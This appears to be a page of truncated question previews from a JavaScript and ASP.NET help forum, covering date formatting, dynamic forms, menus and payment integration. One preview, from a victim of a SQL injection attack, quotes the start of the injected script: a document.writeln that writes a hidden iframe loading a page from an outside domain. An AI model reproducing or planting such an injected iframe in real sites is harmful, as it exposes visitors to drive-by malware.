i am new to javascript and vb/asp.net. I am using MS Visual Studio 2005. i am trying to build a website page. I have a form where i have checkbox list call chkPayee. it has three items in it, ...
I have the following script, which displays todays date + 5 days, but it does it in the following format m/d/yy, I need it to be displayed on the format of mm/dd/yyyy
How can the script be ...
hi,
i have an anchor tag like this
<a id="id1" href="test.aspx?id=1">click here </a>
the value of id will come from a different field, lets say a text box where the user will enter the id...
Hi Guys
I want to place some divs in a timesheet i have created. But i want to check if they overlap eachother.
Lets say i have a div with style, top:100;height:200;width:100%;
then i...
This is what I have... but if I add to the page (making the page longer)... the x and y offset values need to be changed... but this is a dynamically created list... does any one have a bette...
Hi,
Basically my problem is I made a dynamic form using the following javascript function, and now I need to write a second function that pulls the form data after the user has selected whi...
I'm having a problem with dynamic loading of scripts. We have to do it a
bit ugly, using document.body.innerHTML to add strings containing
'<script src="serverscript.js" type="text/javascr...
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><...
Hi,
I am using a datagrid in asp.net 1.1v. I want to use javascript for validation.
I want to validate the records in datagrid through a button outside the grid.
There are...
I'm using php and jquery for a login page - this works well. However, after I check to see if the user has entered a correct userid and password, I want to replace my current navigation with ...
Hi,
I have a signup form in my website where new users get registered.
I need to prevent them from entering any weird charcters espacially when they create a username.
The most importan...
This script works fine in Firefox, but has issues in IE 6.
It is meant to loop though a series of HTML links and set their style to visible (I only want the links to appear if Javascript is...
Hello,
We use the Spry Menu Bar Javascript that is included with Dreamweaver for our left hand column navigation.
As you can see on our original site www.glowshiftdirect.com it works fine...
Hello,
my first question to the experts so please go easy if i post the code wrong!
i am developing a site which has several links that when moused over make some content appear in a div e...
I need an image gallery with a vertical auto scrolling thumbnail.
Very similar if not identical to the one on http://www.tc-bathrooms.com/
I have found a few varieties on dynamic drive...
Hello Experts,
I am making an icon on the page to look pale by reducing its opacity when the user clicks on it.
something like this
$(this).animate({opacity: "0.3"}, 500);
It is working f...
I have a html page that is split into 3 iframes which are loaded and then use js to load numerous hidden iframes. I am attempting to assign eventListeners when a user use's a particular key. I...
Hi,
I have a confirmation dialog. It is being used to warn the user about a time consuming operation, and confirm that he wants to proceed. The problem is that the dialog window does not clos...
I'm using JQuery from this "Expandable side bar menu" example :
http://www.vimeo.com/116991
I'm trying to change the background colour of the selected/clicked on HTML element (a DT)
I wan...
Can we disable back button in the internet browser toolbar using java script? if yes please let me know the solution.
I'm putting together a page which when a thumbnail is clicked a larger version of the image fades in along with some text to go with it. I've got it working here, http://www.emtrade.arrivalpre...
Hi,
I am trying to solve an issue and the following is the only solution I can think of if it is possible.
I have an internal company website for our employees so download speed is not a...
How do I implement the remove() function in the following api for each marker instance?
http://code.google.com/apis/maps/documentation/services.html#StreetviewClientQuerys
Link to my .js f...
need sample code to restore multiple selections made in a list box using jsp and javascript
<html>
<head>
Need JavaScript Code to restore multiple values selected in the listbox on form sub...
I am trying to integrated paypal in my commerce website using the following code. But the problem is that when I completed the payment in Paypal website, it does not return to the "retun_url" ...